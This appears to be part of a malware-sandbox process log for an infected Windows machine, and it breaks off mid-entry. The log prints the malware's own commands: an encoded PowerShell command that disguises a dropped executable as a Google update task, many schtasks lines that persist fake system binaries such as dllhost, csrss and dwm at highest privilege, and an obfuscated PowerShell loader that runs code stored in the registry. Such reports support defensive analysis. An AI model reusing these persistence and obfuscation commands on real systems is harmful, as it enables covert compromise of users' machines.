                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdwBzACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAJwAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAUABBAEEAagBBAEcAYwBBAFoAZwBCAHcAQQBDAE0AQQBQAGcAQQBnAEEARgBNAEEAZABBAEIAaABBAEgASQBBAGQAQQBBAHQAQQBGAEEAQQBjAGcAQgB2AEEARwBNAEEAWgBRAEIAegBBAEgATQBBAEkAQQBBAHQAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEAVQBBAEIAaABBAEgAUQBBAGEAQQBBAGcAQQBDAGMAQQBRAHcAQQA2AEEARgB3AEEAVQBBAEIAeQBBAEcAOABBAFoAdwBCAHkAQQBHAEUAQQBiAFEAQQBnAEEARQBZAEEAYQBRAEIAcwBBAEcAVQBBAGMAdwBCAGMAQQBFAGMAQQBiAHcAQgB2AEEARwBjAEEAYgBBAEIAbABBAEYAdwBBAFEAdwBCAG8AQQBIAEkAQQBiAHcAQgB0AEEARwBVAEEAWABBAEIAMQBBAEgAQQBBAFoAQQBCAGgAQQBIAFEAQQBaAFEAQgB5AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDADAAQQBWAGcAQgBsAEEASABJAEEAWQBnAEEAZwBBAEYASQBBAGQAUQBCAHUAQQBFAEUAQQBjAHcAQQBnAEEARAB3AEEASQB3AEIAegBBAEgAZwBBAGMAQQBBAGoAQQBEADQAQQAiACcAKQAgADwAIwBtAG0AIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBuAHkAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwByAGsAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAYQBiACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAbwB3AG4AbABvAGEAZABzAFwAZgB1AGwAbAAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGkAagAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAagBsACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:4384
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6508 /prefetch:1
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:3676
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6344 /prefetch:8
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4708
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6760 /prefetch:8
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:1376
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6064 /prefetch:8
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:4084
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6012 /prefetch:8
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:392
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6724 /prefetch:8
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5008
                                                                                                                                                                                        • C:\Users\Admin\Downloads\mscontainer.exe
                                                                                                                                                                                          "C:\Users\Admin\Downloads\mscontainer.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:3268
                                                                                                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:2964
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                            PID:3160
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir3160_524656744\ChromeRecovery.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir3160_524656744\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={be0fb5af-48cb-4db1-8c3d-26cfe2820745} --system
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:3536
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\dllhost.exe'" /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            PID:5108
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:4108
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:4348
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "chromec" /sc MINUTE /mo 11 /tr "'C:\odt\chrome.exe'" /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:3812
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "chrome" /sc ONLOGON /tr "'C:\odt\chrome.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:1296
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "chromec" /sc MINUTE /mo 11 /tr "'C:\odt\chrome.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:700
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Mail\dllhost.exe'" /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:388
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:3268
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Mail\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:4212
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office\Office16\winlogon.exe'" /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:1300
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office16\winlogon.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:4804
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\Office16\winlogon.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:1008
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Idle.exe'" /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:5064
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:1092
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:1128
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft\TextInputHost.exe'" /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:3748
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\TextInputHost.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:2376
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft\TextInputHost.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            PID:2328
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Windows\Globalization\Sorting\dwm.exe'" /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            PID:3048
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\Globalization\Sorting\dwm.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:2200
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Windows\Globalization\Sorting\dwm.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:4544
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Windows\PLA\Templates\dwm.exe'" /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:2476
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\PLA\Templates\dwm.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            PID:4876
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Windows\PLA\Templates\dwm.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:3952
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\comsurrogateBrowserdriverperf\RuntimeBroker.exe'" /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:1148
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\comsurrogateBrowserdriverperf\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:5100
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\comsurrogateBrowserdriverperf\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:3568
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Documents\My Videos\StartMenuExperienceHost.exe'" /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:2396
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\Default\Documents\My Videos\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:3888
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Documents\My Videos\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            PID:5104
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Windows\security\csrss.exe'" /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:2108
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Windows\security\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:1364
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\security\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:3840
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Windows\Speech\Idle.exe'" /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:3824
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\Speech\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:2300
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:4604
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "INSTI" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\INST.exe'" /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:1444
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "INST" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\INST.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:3144
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "INSTI" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\INST.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:1552
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "INSTI" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\SubsetList\INST.exe'" /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:4892
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "INST" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\SubsetList\INST.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            PID:1468
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "INSTI" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\SubsetList\INST.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:4644
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Libraries\Idle.exe'" /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:552
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Public\Libraries\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            PID:1028
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:1720
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                            PID:4308
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4980
                                                                                                                                                                                            • C:\Windows\System32\dllhost.exe
                                                                                                                                                                                              C:\Windows\System32\dllhost.exe /Processid:{b6e12fb4-825f-4e38-8960-f9f5deef9648}
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:3160
                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                schtasks.exe /create /tn "chromec" /sc MINUTE /mo 13 /tr "'C:\Program Files\Mozilla Firefox\chrome.exe'" /f
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                PID:752
                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                schtasks.exe /create /tn "chrome" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\chrome.exe'" /rl HIGHEST /f
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                PID:3512
                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
